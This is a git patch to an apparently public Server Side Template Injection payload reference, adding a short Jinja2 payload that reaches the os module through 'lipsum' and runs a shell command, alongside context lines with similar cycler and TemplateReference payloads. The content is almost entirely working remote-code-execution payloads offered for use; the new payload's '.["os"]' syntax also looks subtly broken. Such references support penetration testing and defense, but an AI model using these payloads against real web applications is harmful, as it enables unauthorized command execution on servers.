From 9c2b0402424e8a036496de6476225292d483f7e3 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?R=C3=A9mi=20GASCOU=20=28Podalirius=29?=
 <podalirius@protonmail.com>
Date: Tue, 9 May 2023 18:34:35 +0200
Subject: [PATCH] Adding Jinja2 RCE through lipsum in Templates

---
 Server Side Template Injection/README.md | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 5c9fe14..3c0324e 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -563,7 +563,7 @@ But when `__builtins__` is filtered, the following payloads are context-free, an
 {{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
 ```
 
-We can use these shorter payloads (this is the shorter payloads known yet):
+We can use these shorter payloads:
 
 ```python
 {{ cycler.__init__.__globals__.os.popen('id').read() }}
@@ -573,6 +573,14 @@ We can use these shorter payloads (this is the shorter payloads known yet):
 
 Source [@podalirius_](https://twitter.com/podalirius_) : https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/
 
+With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template:
+
+```python
+{{ lipsum.__globals__.["os"].popen('id').read() }}
+```
+
+Source: https://twitter.com/podalirius_/status/1655970628648697860
+
 #### Exploit the SSTI by calling subprocess.Popen
 
 :warning: the number 396 will vary depending of the application.